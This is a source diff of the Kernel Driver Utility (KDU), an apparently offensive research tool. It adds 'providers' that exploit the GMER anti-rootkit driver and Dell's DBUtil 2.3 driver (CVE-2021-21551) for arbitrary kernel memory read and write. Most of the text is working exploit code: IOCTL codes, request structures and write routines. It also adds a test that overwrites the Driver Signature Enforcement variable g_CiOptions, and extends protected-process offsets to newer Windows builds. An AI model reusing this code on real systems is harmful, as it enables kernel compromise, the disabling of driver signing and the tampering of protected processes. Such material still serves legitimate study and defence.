+ value = FIELD_OFFSET(DBUTIL_READWRITE_REQUEST, Data) + NumberOfBytes;
+ size = ALIGN_UP_BY(value, PAGE_SIZE);
+
+ pRequest = (DBUTIL_READWRITE_REQUEST*)VirtualAlloc(NULL, size,
+ MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
+
+ if (pRequest) {
+
+ if (VirtualLock(pRequest, size)) {
+
+ pRequest->Unused = 0xDEADBEEF;
+ pRequest->VirtualAddress = VirtualAddress;
+ pRequest->Offset = 0;
+ RtlCopyMemory(&pRequest->Data, Buffer, NumberOfBytes);
+
+ bResult = supCallDriver(DeviceHandle,
+ IOCTL_DBUTIL23_WRITEVM,
+ pRequest,
+ (ULONG)size,
+ pRequest,
+ (ULONG)size);
+
+ if (!bResult)
+ dwError = GetLastError();
+
+ VirtualUnlock(pRequest, size);
+ }
+
+ VirtualFree(pRequest, 0, MEM_RELEASE);
+ }
+
+ SetLastError(dwError);
+ return bResult;
+}
diff --git a/Source/Hamakaze/idrv/dbutil23.h b/Source/Hamakaze/idrv/dbutil23.h
new file mode 100644
index 0000000..9161159
--- /dev/null
+++ b/Source/Hamakaze/idrv/dbutil23.h
@@ -0,0 +1,65 @@
+/*******************************************************************************
+*
+* (C) COPYRIGHT AUTHORS, 2022
+*
+* TITLE: DBUTIL23.H
+*
+* VERSION: 1.12
+*
+* DATE: 25 Jan 2022
+*
+* Dell BIOS Utility 2.3 driver interface header.
+*
+* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
+* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
+* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
+* PARTICULAR PURPOSE.
+*
+*******************************************************************************/
+
+#pragma once
+
+//
+// Dell driver interface.
+//
+
+#define DBUTIL23_DEVICE_TYPE (DWORD)0x9B0C
+
+#define DBUTIL23_FUNCTION_READVM (DWORD)0x7B1
+#define DBUTIL23_FUNCTION_WRITEVM (DWORD)0x7B2
+
+#define IOCTL_DBUTIL23_READVM \
+ CTL_CODE(DBUTIL23_DEVICE_TYPE, DBUTIL23_FUNCTION_READVM, METHOD_BUFFERED, FILE_ANY_ACCESS) //0x9B0C1EC4
+
+#define IOCTL_DBUTIL23_WRITEVM \
+ CTL_CODE(DBUTIL23_DEVICE_TYPE, DBUTIL23_FUNCTION_WRITEVM, METHOD_BUFFERED, FILE_ANY_ACCESS) //0x9B0C1EC8
+
+//
+// Virtual memory read/write
+//
+typedef struct _DBUTIL_READWRITE_REQUEST {
+ ULONG_PTR Unused;
+ ULONG_PTR VirtualAddress;
+ ULONG_PTR Offset;
+ UCHAR Data[1];
+} DBUTIL_READWRITE_REQUEST, * PDBUTIL_READWRITE_REQUEST;
+
+//
+// Size of data to read/write calculated as:
+//
+// InputBufferSize - sizeof packet header 0x18 bytes length
+//
+
+_Success_(return != FALSE)
+BOOL WINAPI DbUtilReadVirtualMemory(
+ _In_ HANDLE DeviceHandle,
+ _In_ ULONG_PTR VirtualAddress,
+ _In_reads_bytes_(NumberOfBytes) PVOID Buffer,
+ _In_ ULONG NumberOfBytes);
+
+_Success_(return != FALSE)
+BOOL WINAPI DbUtilWriteVirtualMemory(
+ _In_ HANDLE DeviceHandle,
+ _In_ ULONG_PTR VirtualAddress,
+ _In_reads_bytes_(NumberOfBytes) PVOID Buffer,
+ _In_ ULONG NumberOfBytes);
diff --git a/Source/Hamakaze/idrv/gmer.cpp b/Source/Hamakaze/idrv/gmer.cpp
new file mode 100644
index 0000000..a8f02d0
--- /dev/null
+++ b/Source/Hamakaze/idrv/gmer.cpp
@@ -0,0 +1,134 @@
+/*******************************************************************************
+*
+* (C) COPYRIGHT AUTHORS, 2022
+*
+* TITLE: GMER.CPP
+*
+* VERSION: 1.12
+*
+* DATE: 25 Jan 2022
+*
+* GMER driver routines.
+*
+* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
+* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
+* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
+* PARTICULAR PURPOSE.
+*
+*******************************************************************************/
+
+#include "global.h"
+#include "idrv/gmer.h"
+
+/*
+* GmerRegisterDriver
+*
+* Purpose:
+*
+* Driver initialization routine.
+*
+*/
+BOOL WINAPI GmerRegisterDriver(
+ _In_ HANDLE DeviceHandle,
+ _In_opt_ PVOID Param)
+{
+ UNREFERENCED_PARAMETER(Param);
+
+ BOOL bResult;
+ ULONG ulRegistration = 0;
+
+ bResult = supCallDriver(DeviceHandle,
+ IOCTL_GMER_REGISTER_CLIENT,
+ &ulRegistration,
+ sizeof(ULONG),
+ &ulRegistration,
+ sizeof(ULONG));
+
+ return bResult && (ulRegistration == 1);
+}
+
+/*
+* GmerReadVirtualMemory
+*
+* Purpose:
+*
+* Read virtual memory via Gmer.
+*
+*/
+_Success_(return != FALSE)
+BOOL WINAPI GmerReadVirtualMemory(
+ _In_ HANDLE DeviceHandle,
+ _In_ ULONG_PTR VirtualAddress,
+ _In_reads_bytes_(NumberOfBytes) PVOID Buffer,
+ _In_ ULONG NumberOfBytes)
+{
+ GMER_READ_REQUEST request;
+
+ request.VirtualAddress = VirtualAddress;
+
+ return supCallDriver(DeviceHandle,
+ IOCTL_GMER_READVM,
+ &request,
+ sizeof(GMER_READ_REQUEST),
+ Buffer,
+ NumberOfBytes);
+
+}
+
+/*
+* GmerWriteVirtualMemory
+*
+* Purpose:
+*
+* Write virtual memory via Gmer.
+*
+*/
+_Success_(return != FALSE)
+BOOL WINAPI GmerWriteVirtualMemory(
+ _In_ HANDLE DeviceHandle,
+ _In_ ULONG_PTR VirtualAddress,
+ _In_reads_bytes_(NumberOfBytes) PVOID Buffer,
+ _In_ ULONG NumberOfBytes)
+{
+ BOOL bResult = FALSE;
+
+ SIZE_T size;
+ ULONG value;
+ DWORD dwError = ERROR_SUCCESS;
+
+ GMER_WRITE_REQUEST* pRequest;
+
+ value = FIELD_OFFSET(GMER_WRITE_REQUEST, Data) + NumberOfBytes;
+ size = ALIGN_UP_BY(value, PAGE_SIZE);
+
+ pRequest = (GMER_WRITE_REQUEST*)VirtualAlloc(NULL, size,
+ MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
+
+ if (pRequest) {
+
+ if (VirtualLock(pRequest, size)) {
+
+ pRequest->Unused = 0;
+ pRequest->VirtualAddress = VirtualAddress;
+ pRequest->DataSize = NumberOfBytes;
+ RtlCopyMemory(&pRequest->Data, Buffer, NumberOfBytes);
+
+ bResult = supCallDriver(DeviceHandle,
+ IOCTL_GMER_WRITEVM,
+ pRequest,
+ (ULONG)size,
+ NULL,
+ 0);
+
+ if (!bResult)
+ dwError = GetLastError();
+
+ VirtualUnlock(pRequest, size);
+ }
+
+ VirtualFree(pRequest, 0, MEM_RELEASE);
+ }
+
+ SetLastError(dwError);
+ return bResult;
+}
diff --git a/Source/Hamakaze/idrv/gmer.h b/Source/Hamakaze/idrv/gmer.h
new file mode 100644
index 0000000..9cf637c
--- /dev/null
+++ b/Source/Hamakaze/idrv/gmer.h
@@ -0,0 +1,70 @@
+/*******************************************************************************
+*
+* (C) COPYRIGHT AUTHORS, 2022
+*
+* TITLE: GMER.H
+*
+* VERSION: 1.12
+*
+* DATE: 25 Jan 2022
+*
+* GMER driver interface header.
+*
+* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
+* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
+* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
+* PARTICULAR PURPOSE.
+*
+*******************************************************************************/
+
+#pragma once
+
+
+//
+// Gmer driver interface.
+//
+
+#define GMER_DEVICE_TYPE (DWORD)0x7201
+#define GMER_DEVICE_TYPE_2 (DWORD)0x9876
+
+#define GMER_FUNCTION_READVM 0xA
+#define GMER_FUNCTION_WRITEVM 0xD
+#define GMER_FUNCTION_REGISTER_CLIENT 0x1
+
+#define IOCTL_GMER_REGISTER_CLIENT \
+ CTL_CODE(GMER_DEVICE_TYPE_2, GMER_FUNCTION_REGISTER_CLIENT, METHOD_BUFFERED, FILE_READ_ACCESS | FILE_WRITE_ACCESS) //0x9876C004
+
+#define IOCTL_GMER_READVM \
+ CTL_CODE(GMER_DEVICE_TYPE, GMER_FUNCTION_READVM, METHOD_BUFFERED, FILE_READ_ACCESS | FILE_WRITE_ACCESS) //0x7201C028
+
+#define IOCTL_GMER_WRITEVM \
+ CTL_CODE(GMER_DEVICE_TYPE, GMER_FUNCTION_WRITEVM, METHOD_BUFFERED, FILE_READ_ACCESS | FILE_WRITE_ACCESS) //0x7201C034
+
+typedef struct _GMER_READ_REQUEST {
+ ULONG_PTR VirtualAddress;
+} GMER_READ_REQUEST, * PGMER_READ_REQUEST;
+
+typedef struct _GMER_WRITE_REQUEST {
+ ULONG_PTR Unused;
+ ULONG_PTR VirtualAddress;
+ ULONG DataSize;
+ UCHAR Data[1];
+} GMER_WRITE_REQUEST, * PGMER_WRITE_REQUEST;
+
+BOOL WINAPI GmerRegisterDriver(
+ _In_ HANDLE DeviceHandle,
+ _In_opt_ PVOID Param);
+
+_Success_(return != FALSE)
+BOOL WINAPI GmerReadVirtualMemory(
+ _In_ HANDLE DeviceHandle,
+ _In_ ULONG_PTR VirtualAddress,
+ _In_reads_bytes_(NumberOfBytes) PVOID Buffer,
+ _In_ ULONG NumberOfBytes);
+
+_Success_(return != FALSE)
+BOOL WINAPI GmerWriteVirtualMemory(
+ _In_ HANDLE DeviceHandle,
+ _In_ ULONG_PTR VirtualAddress,
+ _In_reads_bytes_(NumberOfBytes) PVOID Buffer,
+ _In_ ULONG NumberOfBytes);
diff --git a/Source/Hamakaze/idrv/winring0.cpp b/Source/Hamakaze/idrv/winring0.cpp
index 1dfea35..66135d7 100644
--- a/Source/Hamakaze/idrv/winring0.cpp
+++ b/Source/Hamakaze/idrv/winring0.cpp
@@ -1,12 +1,12 @@
/*******************************************************************************
*
-* (C) COPYRIGHT AUTHORS, 2020 - 2021
+* (C) COPYRIGHT AUTHORS, 2020 - 2022
*
* TITLE: WINRING0.CPP
*
-* VERSION: 1.11
+* VERSION: 1.12
*
-* DATE: 19 Apr 2021
+* DATE: 25 Jan 2022
*
* WinRing0 based drivers routines.
*
@@ -221,14 +221,14 @@ BOOL WINAPI WRZeroReadKernelVirtualMemory(
}
/*
-* WRZeroKernelVirtualMemory
+* WRZeroWriteKernelVirtualMemory
*
* Purpose:
*
* Write virtual memory.
*
*/
-BOOL WINAPI WRZeroKernelVirtualMemory(
+BOOL WINAPI WRZeroWriteKernelVirtualMemory(
_In_ HANDLE DeviceHandle,
_In_ ULONG_PTR Address,
_Out_writes_bytes_(NumberOfBytes) PVOID Buffer,
diff --git a/Source/Hamakaze/idrv/winring0.h b/Source/Hamakaze/idrv/winring0.h
index 671f5e9..162a12d 100644
--- a/Source/Hamakaze/idrv/winring0.h
+++ b/Source/Hamakaze/idrv/winring0.h
@@ -80,7 +80,7 @@ BOOL WINAPI WRZeroReadKernelVirtualMemory(
_Out_writes_bytes_(NumberOfBytes) PVOID Buffer,
_In_ ULONG NumberOfBytes);
-BOOL WINAPI WRZeroKernelVirtualMemory(
+BOOL WINAPI WRZeroWriteKernelVirtualMemory(
_In_ HANDLE DeviceHandle,
_In_ ULONG_PTR Address,
_Out_writes_bytes_(NumberOfBytes) PVOID Buffer,
diff --git a/Source/Hamakaze/kduplist.h b/Source/Hamakaze/kduplist.h
index 5d8b5c4..7c66b22 100644
--- a/Source/Hamakaze/kduplist.h
+++ b/Source/Hamakaze/kduplist.h
@@ -1,12 +1,12 @@
/*******************************************************************************
*
-* (C) COPYRIGHT AUTHORS, 2020 - 2021
+* (C) COPYRIGHT AUTHORS, 2020 - 2022
*
* TITLE: KDUPLIST.H
*
-* VERSION: 1.11
+* VERSION: 1.12
*
-* DATE: 18 Apr 2021
+* DATE: 25 Jan 2022
*
* Providers global list.
*
@@ -232,7 +232,7 @@ static KDU_PROVIDER g_KDUProviders[] =
(provAllocateKernelVM)KDUProviderStub,
(provFreeKernelVM)KDUProviderStub,
(provReadKernelVM)WRZeroReadKernelVirtualMemory,
- (provWriteKernelVM)WRZeroKernelVirtualMemory,
+ (provWriteKernelVM)WRZeroWriteKernelVirtualMemory,
(provVirtualToPhysical)WRZeroVirtualToPhysical,
(provReadControlRegister)KDUProviderStub,
(provQueryPML4)WRZeroQueryPML4Value,
@@ -427,5 +427,59 @@ static KDU_PROVIDER g_KDUProviders[] =
(provQueryPML4)DI64QueryPML4Value,
(provReadPhysicalMemory)DI64ReadPhysicalMemory,
(provWritePhysicalMemory)DI64WritePhysicalMemory
+ },
+
+ {
+ KDU_MIN_NTBUILDNUMBER,
+ KDU_MAX_NTBUILDNUMBER,
+ IDR_GMERDRV,
+ SourceBaseNone,
+ KDUPROV_FLAGS_NONE,
+ (LPWSTR)L"Gmer \"Antirootkit\"",
+ (LPWSTR)L"gmerdrv",
+ (LPWSTR)L"gmerdrv",
+ (LPWSTR)L"GMEREK Systemy Komputerowe Przemyslaw Gmerek",
+
+ (provRegisterDriver)GmerRegisterDriver,
+ (provUnregisterDriver)KDUProviderStub,
+ (provPreOpenDriver)KDUProviderStub,
+ (provPostOpenDriver)KDUProviderStub,
+
+ (provAllocateKernelVM)KDUProviderStub,
+ (provFreeKernelVM)KDUProviderStub,
+ (provReadKernelVM)GmerReadVirtualMemory,
+ (provWriteKernelVM)GmerWriteVirtualMemory,
+ (provVirtualToPhysical)KDUProviderStub,
+ (provReadControlRegister)KDUProviderStub,
+ (provQueryPML4)KDUProviderStub,
+ (provReadPhysicalMemory)KDUProviderStub,
+ (provWritePhysicalMemory)KDUProviderStub
+ },
+
+ {
+ KDU_MIN_NTBUILDNUMBER,
+ KDU_MAX_NTBUILDNUMBER,
+ IDR_DBUTIL23,
+ SourceBaseNone,
+ KDUPROV_FLAGS_NO_UNLOAD_SUP,
+ (LPWSTR)L"CVE-2021-21551",
+ (LPWSTR)L"DBUtil23",
+ (LPWSTR)L"DBUtil_2_3",
+ (LPWSTR)L"Dell Inc.",
+
+ (provRegisterDriver)KDUProviderStub,
+ (provUnregisterDriver)KDUProviderStub,
+ (provPreOpenDriver)KDUProviderStub,
+ (provPostOpenDriver)KDUProviderStub,
+
+ (provAllocateKernelVM)KDUProviderStub,
+ (provFreeKernelVM)KDUProviderStub,
+ (provReadKernelVM)DbUtilReadVirtualMemory,
+ (provWriteKernelVM)DbUtilWriteVirtualMemory,
+ (provVirtualToPhysical)KDUProviderStub,
+ (provReadControlRegister)KDUProviderStub,
+ (provQueryPML4)KDUProviderStub,
+ (provReadPhysicalMemory)KDUProviderStub,
+ (provWritePhysicalMemory)KDUProviderStub
}
};
diff --git a/Source/Hamakaze/kduprov.cpp b/Source/Hamakaze/kduprov.cpp
index 7ccceca..7967c6c 100644
--- a/Source/Hamakaze/kduprov.cpp
+++ b/Source/Hamakaze/kduprov.cpp
@@ -1,12 +1,12 @@
/*******************************************************************************
*
-* (C) COPYRIGHT AUTHORS, 2020 - 2021
+* (C) COPYRIGHT AUTHORS, 2020 - 2022
*
* TITLE: KDUPROV.CPP
*
-* VERSION: 1.11
+* VERSION: 1.12
*
-* DATE: 18 Apr 2021
+* DATE: 25 Jan 2022
*
* Vulnerable drivers provider abstraction layer.
*
@@ -27,6 +27,8 @@
#include "idrv/phymem.h"
#include "idrv/lha.h"
#include "idrv/directio64.h"
+#include "idrv/gmer.h"
+#include "idrv/dbutil23.h"
#include "kduplist.h"
/*
@@ -99,6 +101,12 @@ VOID KDUProvList()
if (prov->IgnoreChecksum)
printf_s("\tIgnore invalid image checksum\r\n");
+ //
+ // Some BIOS flashing drivers does not support unload.
+ //
+ if (prov->NoUnloadSupported)
+ printf_s("\tDriver does not support unload procedure\r\n");
+
//
// List "based" flags.
//
@@ -835,10 +843,18 @@ VOID WINAPI KDUProviderRelease(
if (Context->DeviceHandle)
NtClose(Context->DeviceHandle);
- //
- // Unload driver.
- //
- KDUProvStopVulnerableDriver(Context);
+ if (Context->Provider->NoUnloadSupported) {
+ supPrintfEvent(kduEventInformation,
+ "[~] This driver does not support unload procedure, reboot PC to get rid of it\r\n");
+ }
+ else {
+
+ //
+ // Unload driver.
+ //
+ KDUProvStopVulnerableDriver(Context);
+
+ }
if (Context->DriverFileName)
supHeapFree(Context->DriverFileName);
diff --git a/Source/Hamakaze/kduprov.h b/Source/Hamakaze/kduprov.h
index 930b0a2..278cf3a 100644
--- a/Source/Hamakaze/kduprov.h
+++ b/Source/Hamakaze/kduprov.h
@@ -1,12 +1,12 @@
/*******************************************************************************
*
-* (C) COPYRIGHT AUTHORS, 2014 - 2021
+* (C) COPYRIGHT AUTHORS, 2014 - 2022
*
* TITLE: KDUPROV.H
*
-* VERSION: 1.11
+* VERSION: 1.12
*
-* DATE: 18 Apr 2021
+* DATE: 25 Jan 2022
*
* Provider support routines.
*
@@ -34,6 +34,8 @@
#define KDU_PROVIDER_LHA 12
#define KDU_PROVIDER_ASUSIO2 13
#define KDU_PROVIDER_DIRECTIO64 14
+#define KDU_PROVIDER_GMER 15
+#define KDU_PROVIDER_DBUTIL23 16
#define KDU_PROVIDER_DEFAULT KDU_PROVIDER_INTEL_NAL
@@ -183,6 +185,11 @@ typedef enum _KDU_ACTION_TYPE {
//
#define KDUPROV_FLAGS_NO_FORCED_SD 0x00000008
+//
+// Do not unload, driver does not support this.
+//
+#define KDUPROV_FLAGS_NO_UNLOAD_SUP 0x00000010
+
typedef enum _KDU_SOURCEBASE {
SourceBaseNone = 0,
SourceBaseWinIo,
@@ -204,7 +211,8 @@ typedef struct _KDU_PROVIDER {
ULONG SignatureWHQL : 1;
ULONG IgnoreChecksum : 1;
ULONG NoForcedSD : 1;
- ULONG Reserved : 28;
+ ULONG NoUnloadSupported : 1;
+ ULONG Reserved : 27;
};
};
LPWSTR Desciption;
diff --git a/Source/Hamakaze/main.cpp b/Source/Hamakaze/main.cpp
index 6e10f11..b7d4444 100644
--- a/Source/Hamakaze/main.cpp
+++ b/Source/Hamakaze/main.cpp
@@ -1,12 +1,12 @@
/*******************************************************************************
*
-* (C) COPYRIGHT AUTHORS, 2020 - 2021
+* (C) COPYRIGHT AUTHORS, 2020 - 2022
*
* TITLE: MAIN.CPP
*
-* VERSION: 1.11
+* VERSION: 1.12
*
-* DATE: 14 May 2021
+* DATE: 25 Jan 2022
*
* Hamakaze main logic and entrypoint.
*
@@ -533,7 +533,7 @@ VOID KDUIntroBanner()
{
IMAGE_NT_HEADERS* ntHeaders = RtlImageNtHeader(NtCurrentPeb()->ImageBaseAddress);
- printf_s("[#] Kernel Driver Utility v1.1.1 started, (c)2020 - 2021 KDU Project\r\n"\
+ printf_s("[#] Kernel Driver Utility v1.1.2 started, (c)2020 - 2022 KDU Project\r\n"\
"[#] Build at %s, header checksum 0x%lX\r\n"\
"[#] Supported x64 OS : Windows 7 and above\r\n",
__TIMESTAMP__,
diff --git a/Source/Hamakaze/pagewalk.cpp b/Source/Hamakaze/pagewalk.cpp
index b3cd54e..e757afc 100644
--- a/Source/Hamakaze/pagewalk.cpp
+++ b/Source/Hamakaze/pagewalk.cpp
@@ -4,9 +4,9 @@
*
* TITLE: PAGEWALK.CPP
*
-* VERSION: 1.11
+* VERSION: 1.12
*
-* DATE: 18 Apr 2021
+* DATE: 16 May 2021
*
* Function to translate virtual to physical addresses, x86-64.
*
@@ -20,7 +20,9 @@
#include "global.h"
#define PHY_ADDRESS_MASK 0x000ffffffffff000ull
+#define PHY_ADDRESS_MASK_1GB_PAGES 0x000fffffc0000000ull
#define PHY_ADDRESS_MASK_2MB_PAGES 0x000fffffffe00000ull
+#define VADDR_ADDRESS_MASK_1GB_PAGES 0x000000003fffffffull
#define VADDR_ADDRESS_MASK_2MB_PAGES 0x00000000001fffffull
#define VADDR_ADDRESS_MASK_4KB_PAGES 0x0000000000000fffull
#define ENTRY_PRESENT_BIT 1
@@ -76,11 +78,21 @@ BOOL PwVirtualToPhysical(
return 0;
}
- if ((r == 2) && ((entry & ENTRY_PAGE_SIZE_BIT) != 0)) {
- table &= PHY_ADDRESS_MASK_2MB_PAGES;
- table += VirtualAddress & VADDR_ADDRESS_MASK_2MB_PAGES;
- *PhysicalAddress = table;
- return 1;
+ if (entry & ENTRY_PAGE_SIZE_BIT)
+ {
+ if (r == 1) {
+ table &= PHY_ADDRESS_MASK_1GB_PAGES;
+ table += VirtualAddress & VADDR_ADDRESS_MASK_1GB_PAGES;
+ *PhysicalAddress = table;
+ return 1;
+ }
+
+ if (r == 2) {
+ table &= PHY_ADDRESS_MASK_2MB_PAGES;
+ table += VirtualAddress & VADDR_ADDRESS_MASK_2MB_PAGES;
+ *PhysicalAddress = table;
+ return 1;
+ }
}
}
diff --git a/Source/Hamakaze/ps.cpp b/Source/Hamakaze/ps.cpp
index 121c033..227073a 100644
--- a/Source/Hamakaze/ps.cpp
+++ b/Source/Hamakaze/ps.cpp
@@ -1,12 +1,12 @@
/*******************************************************************************
*
-* (C) COPYRIGHT AUTHORS, 2018 - 2021
+* (C) COPYRIGHT AUTHORS, 2018 - 2022
*
* TITLE: PS.CPP
*
-* VERSION: 1.10
+* VERSION: 1.12
*
-* DATE: 15 Apr 2021
+* DATE: 25 Jan 2022
*
* Processes DKOM related routines.
*
@@ -152,7 +152,9 @@ BOOL KDUControlProcess(
case NT_WIN10_20H1:
case NT_WIN10_20H2:
case NT_WIN10_21H1:
- case NTX_WIN10_ADB:
+ case NT_WIN10_21H2:
+ case NT_WIN11_21H2:
+ case NTX_WIN11_ADB:
Offset = PsProtectionOffset_19041;
break;
default:
diff --git a/Source/Hamakaze/ps.h b/Source/Hamakaze/ps.h
index 1d7308a..c84f63d 100644
--- a/Source/Hamakaze/ps.h
+++ b/Source/Hamakaze/ps.h
@@ -1,12 +1,12 @@
/*******************************************************************************
*
-* (C) COPYRIGHT AUTHORS, 2018 - 2021
+* (C) COPYRIGHT AUTHORS, 2018 - 2022
*
* TITLE: PS.H
*
-* VERSION: 1.10
+* VERSION: 1.12
*
-* DATE: 02 Apr 2021
+* DATE: 25 Jan 2022
*
* Processes support prototypes and definitions.
*
@@ -26,7 +26,7 @@
#define PsProtectionOffset_15063 (ULONG_PTR)0x6CA //same for 16299, 17134, 17763
#define PsProtectionOffset_18362 (ULONG_PTR)0x6FA
#define PsProtectionOffset_18363 (ULONG_PTR)0x6FA
-#define PsProtectionOffset_19041 (ULONG_PTR)0x87A; //same for 19042..19043
+#define PsProtectionOffset_19041 (ULONG_PTR)0x87A //same for 19042..19044
#define EPROCESS_TO_PROTECTION(Object, PsProtectionOffset) ((ULONG_PTR)Object + (ULONG_PTR)PsProtectionOffset)
diff --git a/Source/Hamakaze/res/SB_SMBUS_SDK.bin b/Source/Hamakaze/res/SB_SMBUS_SDK.bin
index 7f7a90a..2849bf3 100644
Binary files a/Source/Hamakaze/res/SB_SMBUS_SDK.bin and b/Source/Hamakaze/res/SB_SMBUS_SDK.bin differ
diff --git a/Source/Hamakaze/resource.rc b/Source/Hamakaze/resource.rc
index 1bc854f..d336162 100644
--- a/Source/Hamakaze/resource.rc
+++ b/Source/Hamakaze/resource.rc
@@ -51,8 +51,8 @@ END
//
VS_VERSION_INFO VERSIONINFO
- FILEVERSION 1,1,1,2105
- PRODUCTVERSION 1,1,1,2105
+ FILEVERSION 1,1,2,2201
+ PRODUCTVERSION 1,1,2,2201
FILEFLAGSMASK 0x3fL
#ifdef _DEBUG
FILEFLAGS 0x1L
@@ -69,12 +69,12 @@ BEGIN
BEGIN
VALUE "CompanyName", "UG North"
VALUE "FileDescription", "Kernel Driver Utility"
- VALUE "FileVersion", "1.1.1.2105"
+ VALUE "FileVersion", "1.1.2.2201"
VALUE "InternalName", "Hamakaze.exe"
- VALUE "LegalCopyright", "Copyright (C) 2020 - 2021 KDU Project"
+ VALUE "LegalCopyright", "Copyright (C) 2020 - 2022 KDU Project"
VALUE "OriginalFilename", "Hamakaze.exe"
VALUE "ProductName", "KDU"
- VALUE "ProductVersion", "1.1.1.2105"
+ VALUE "ProductVersion", "1.1.2.2201"
END
END
BLOCK "VarFileInfo"
diff --git a/Source/Hamakaze/tests.cpp b/Source/Hamakaze/tests.cpp
index 11be5dd..dd1c09d 100644
--- a/Source/Hamakaze/tests.cpp
+++ b/Source/Hamakaze/tests.cpp
@@ -1,12 +1,12 @@
/*******************************************************************************
*
-* (C) COPYRIGHT AUTHORS, 2020 - 2021
+* (C) COPYRIGHT AUTHORS, 2020 - 2022
*
* TITLE: TESTS.CPP
*
-* VERSION: 1.11
+* VERSION: 1.12
*
-* DATE: 14 May 2021
+* DATE: 25 Jan 2022
*
* KDU tests.
*
@@ -47,6 +47,21 @@ VOID KDUTestLoad()
}
}
+VOID KDUTestDSE(PKDU_CONTEXT Context)
+{
+ ULONG_PTR g_CiOptions = 0xfffff805fc446d18;
+ ULONG_PTR oldValue = 0, newValue = 0x1337, testValue = 0;
+
+ KDUReadKernelVM(Context, g_CiOptions, &oldValue, sizeof(oldValue));
+ Beep(0, 0);
+ KDUWriteKernelVM(Context, g_CiOptions, &newValue, sizeof(newValue));
+ Beep(0, 0);
+ KDUReadKernelVM(Context, g_CiOptions, &testValue, sizeof(testValue));
+ if (testValue != newValue)
+ Beep(1, 1);
+ KDUWriteKernelVM(Context, g_CiOptions, &oldValue, sizeof(oldValue));
+}
+
VOID KDUTest()
{
PKDU_CONTEXT Context;
@@ -56,26 +71,30 @@ VOID KDUTest()
RtlSecureZeroMemory(&Buffer, sizeof(Buffer));
- Context = KDUProviderCreate(14, FALSE, 7601, KDU_SHELLCODE_V1, ActionTypeMapDriver);
+ Context = KDUProviderCreate(16, FALSE, 7601, KDU_SHELLCODE_V1, ActionTypeMapDriver);
if (Context) {
- /*ULONG64 dummy = 0;
+ KDUTestDSE(Context);
- KDUReadKernelVM(Context,
+ //ULONG64 dummy = 0;
+
+ /*KDUReadKernelVM(Context,
0xfffff80afbbe6d18,
&dummy,
sizeof(dummy));*/
if (supQueryObjectFromHandle(Context->DeviceHandle, &objectAddress)) {
- Context->Provider->Callbacks.ReadPhysicalMemory(
+ /* Context->Provider->Callbacks.ReadPhysicalMemory(
Context->DeviceHandle,
0x1000,
&Buffer,
0x1000);
-
+ */
value = 0x1234567890ABCDEF;
+ //objectAddress = 0xfffff80710636d18;
+
FILE_OBJECT fileObject;
RtlSecureZeroMemory(&fileObject, sizeof(FILE_OBJECT));
@@ -83,7 +102,7 @@ VOID KDUTest()
KDUReadKernelVM(Context,
objectAddress,
&fileObject,
- sizeof(fileObject));
+ sizeof(FILE_OBJECT));
Beep(0, 0);
diff --git a/Source/Shared/ntos/ntbuilds.h b/Source/Shared/ntos/ntbuilds.h
new file mode 100644
index 0000000..b09753f
--- /dev/null
+++ b/Source/Shared/ntos/ntbuilds.h
@@ -0,0 +1,80 @@
+/*******************************************************************************
+*
+* (C) COPYRIGHT AUTHORS, 2021
+*
+* TITLE: NTBUILDS.H
+*
+* VERSION: 1.00
+*
+* DATE: 01 Nov 2021
+*
+* Windows NT builds definition file.
+*
+* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
+* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
+* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
+* PARTICULAR PURPOSE.
+*
+*******************************************************************************/
+#pragma once
+
+//
+// Defines for Major Windows NT release builds
+//
+
+// Windows 7 RTM
+#define NT_WIN7_RTM 7600
+
+// Windows 7 SP1
+#define NT_WIN7_SP1 7601
+
+// Windows 8 RTM
+#define NT_WIN8_RTM 9200
+
+// Windows 8.1
+#define NT_WIN8_BLUE 9600
+
+// Windows 10 TH1
+#define NT_WIN10_THRESHOLD1 10240
+
+// Windows 10 TH2
+#define NT_WIN10_THRESHOLD2 10586
+
+// Windows 10 RS1
+#define NT_WIN10_REDSTONE1 14393
+
+// Windows 10 RS2
+#define NT_WIN10_REDSTONE2 15063
+
+// Windows 10 RS3
+#define NT_WIN10_REDSTONE3 16299
+
+// Windows 10 RS4
+#define NT_WIN10_REDSTONE4 17134
+
+// Windows 10 RS5
+#define NT_WIN10_REDSTONE5 17763
+
+// Windows 10 19H1
+#define NT_WIN10_19H1 18362
+
+// Windows 10 19H2
+#define NT_WIN10_19H2 18363
+
+// Windows 10 20H1
+#define NT_WIN10_20H1 19041
+
+// Windows 10 20H2
+#define NT_WIN10_20H2 19042
+
+// Windows 10 21H1
+#define NT_WIN10_21H1 19043
+
+// Windows 10 21H2
+#define NT_WIN10_21H2 19044
+
+// Windows 11 21H2
+#define NT_WIN11_21H2 22000
+
+// Windows 11 Active Develepment Branch (21XX)
+#define NTX_WIN11_ADB 22494
diff --git a/Source/Shared/ntos/ntos.h b/Source/Shared/ntos/ntos.h
index 59cc573..6cf1e05 100644
--- a/Source/Shared/ntos/ntos.h
+++ b/Source/Shared/ntos/ntos.h
@@ -5,9 +5,9 @@
*
* TITLE: NTOS.H
*
-* VERSION: 1.165
+* VERSION: 1.187
*
-* DATE: 26 Apr 2021
+* DATE: 03 Dec 2021
*
* Common header file for the ntos API functions and definitions.
*
@@ -232,6 +232,9 @@ char _RTL_CONSTANT_STRING_type_check(const void *s);
#define OBJ_DONT_REPARSE 0x00001000L
#define OBJ_VALID_ATTRIBUTES 0x00001FF2L
+#define OBJ_PROTECT_CLOSE 0x00000001L
+#define OBJ_AUDIT_OBJECT_CLOSE 0x00000004L
+
//
// Callback Object Rights
//
